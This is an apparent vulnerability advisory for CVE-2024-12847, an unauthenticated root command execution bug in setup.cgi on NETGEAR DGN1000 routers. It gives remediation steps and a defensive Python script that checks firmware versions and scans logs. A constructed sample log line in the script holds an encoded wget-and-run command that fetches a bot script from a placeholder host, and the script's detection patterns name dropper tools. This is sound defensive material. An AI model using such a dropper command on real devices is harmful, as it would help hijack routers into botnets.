CVE-2024-12847

Severity: CRITICAL (CVSS 3.1 base score 9.8)
Published: 2025-01-10 by [email protected]

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

Analysis Generated: Mar 28, 2026 - 18:02 (vuln.today)
PoC Detected: Dec 19, 2025 - 20:15 (vuln.today): public exploit code
CVE Published: Jan 10, 2025 - 20:15 (nvd): CRITICAL 9.8

Description

NETGEAR DGN1000 before 1.1.00.48 is vulnerable to an authentication bypass. A remote, unauthenticated attacker can execute arbitrary operating system commands as root by sending crafted HTTP requests to the setup.cgi endpoint. Exploitation in the wild has been observed since at least 2017, and the Shadowserver Foundation reported active exploitation on 2025-02-06 UTC.

Analysis

NETGEAR DGN1000 routers with firmware before 1.1.00.48 contain an unauthenticated remote command execution vulnerability via the setup.cgi endpoint. The vulnerability has been exploited in the wild since at least 2017, notably by the Mirai-derived Reaper/IoTroop botnet for large-scale DDoS operations.

Technical Context

The setup.cgi endpoint on NETGEAR DGN1000 routers processes user input without authentication or sanitization, passing it directly to shell commands that run as root. The request needs no credentials and no user interaction (CVSS AV:N/PR:N/UI:N), so any host that can reach the router's web interface, the LAN by default and the Internet if remote management is enabled, can take full control of the device with a single crafted HTTP request. Because the commands run as root on the router itself, that one request is enough to fetch and start a botnet payload, which is why the bug has been weaponized in multiple botnet frameworks including Reaper/IoTroop and Mirai variants.

Affected Products

NETGEAR DGN1000 firmware < 1.1.00.48

Remediation

Update firmware to 1.1.00.48 or later. If the router is end-of-life and no fixed firmware is available for it, replace it. Disable remote (WAN-side) management so that setup.cgi is not reachable from the Internet; the fix closes the command-execution bug, but the management interface should still not be exposed. Treat any DGN1000 that was reachable from the Internet while unpatched as potentially already enrolled in a botnet: monitor outbound traffic from the router's own IP address for command-and-control (C2) connections, not only traffic from hosts behind it.
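Two of the checks above, the firmware-version comparison and the monitoring for crafted setup.cgi requests, can be scripted. The block below is an added example written for this page, not code from vuln.today, NETGEAR, or any of the botnet families named; it assumes a NETGEAR-style version string ("V1.1.00.45_1.0.0", letter prefix and optional region suffix) and a simplified access-log format (`<src-ip> "<METHOD> <path?query> HTTP/1.x" <status>`). The public exploit's exact query parameter names are not given on this page, so the detector keys only on the endpoint name, on the request source being outside RFC 1918 space (the web UI exposed to the WAN), and on shell syntax or download-and-run commands in the decoded query string. The log lines are constructed for the example, not captured traffic.

```python
"""Triage helpers for CVE-2024-12847 (NETGEAR DGN1000 setup.cgi unauthenticated RCE).

  1. is_vulnerable_version(): is a reported DGN1000 firmware older than 1.1.00.48?
  2. scan_access_log(): flag HTTP requests to setup.cgi that arrive from outside
     RFC 1918 space or whose query string carries shell syntax / dropper commands.

The version-string and log formats are assumptions for this example; the facts
taken from the advisory are the endpoint (setup.cgi), the fixed release, and
that the endpoint is reachable without authentication.
"""
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

FIXED_VERSION = (1, 1, 0, 48)          # first fixed release: 1.1.00.48

# RFC 1918 ranges only; ipaddress.is_private would also treat the TEST-NET
# documentation ranges as private, which is not what "behind the router" means.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_version(raw: str) -> tuple:
    """Turn 'V1.1.00.45_1.0.0' or '1.1.00.48' into a comparable tuple.
    Assumed NETGEAR format: optional 'V' prefix, optional '_region' suffix;
    only the leading dotted numeric part is compared (00 == 0)."""
    core = raw.strip().lstrip("vV").split("_", 1)[0]
    if not re.fullmatch(r"\d+(\.\d+)*", core):
        raise ValueError(f"unrecognised firmware version: {raw!r}")
    return tuple(int(p) for p in core.split("."))


def is_vulnerable_version(raw: str) -> bool:
    """True when the firmware is older than the fixed release 1.1.00.48."""
    return parse_version(raw) < FIXED_VERSION


def is_lan_source(src: str) -> bool:
    """True when the request came from an RFC 1918 address (the LAN side)."""
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in LAN_NETS)


# Heuristics for a command-injection attempt in the decoded query string:
# shell metacharacters, or the download-and-execute commands botnet droppers use.
SHELL_META = re.compile(r"[;|`&]|\$\(")
DROPPER_CMDS = re.compile(r"\b(wget|curl|tftp|busybox|sh|chmod)\b")

# Assumed log format: '<src-ip> "<METHOD> <path?query> HTTP/1.x" <status>'
LOG_RE = re.compile(r'^(\S+)\s+"(\w+)\s+(\S+)\s+HTTP/[\d.]+"\s+(\d{3})')


def scan_access_log(lines):
    """Return [(src_ip, reason, decoded_query), ...] for suspicious setup.cgi hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not in the assumed format; skip
        src, _method, target, _status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/setup.cgi"):
            continue                      # only the vulnerable endpoint matters
        query = unquote_plus(parts.query) # decode %XX and '+' before matching
        reasons = []
        if not is_lan_source(src):
            reasons.append("setup.cgi reached from non-RFC1918 source")
        if SHELL_META.search(query) or DROPPER_CMDS.search(query):
            reasons.append("shell syntax or dropper command in query")
        if reasons:
            hits.append((src, "; ".join(reasons), query))
    return hits


# Constructed sample log lines (not captured traffic). Line 3 carries a
# URL-encoded backtick-wrapped wget-and-run string as a stand-in for an injection
# attempt; 'x' is a placeholder parameter name, not the real exploit's.
SAMPLE_LOG = [
    '192.168.0.23 "GET /setup.cgi?next_file=index.htm HTTP/1.1" 200',
    '203.0.113.9 "GET /setup.cgi?next_file=index.htm HTTP/1.1" 200',
    '198.51.100.77 "GET /setup.cgi?x=%60wget+http%3A%2F%2F198.51.100.5%2Fbot.sh'
    '+-O+%2Ftmp%2Fb%3Bsh+%2Ftmp%2Fb%60 HTTP/1.1" 200',
    '192.168.0.40 "GET /index.htm HTTP/1.1" 200',
]

if __name__ == "__main__":
    for v in ("V1.1.00.45_1.0.0", "1.1.00.48"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "fixed")
    for src, why, q in scan_access_log(SAMPLE_LOG):
        print(f"{src}: {why} :: {q}")
```

On the sample input the LAN request for the login page is ignored, the same request from a public address is flagged because the management interface should never answer there, and the injection-style request is flagged on both counts. The command-word list is a heuristic and will miss a payload that uses none of those words; the "non-RFC1918 source" rule is the more reliable signal, since on a correctly configured DGN1000 there should be no such requests at all.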

Priority Score: 140 (scale: Low / Medium / High / Critical), the sum of the components below

KEV: +0
EPSS: +71.3
CVSS: +49
POC: +20

CVE-2024-12847 vulnerability details – vuln.today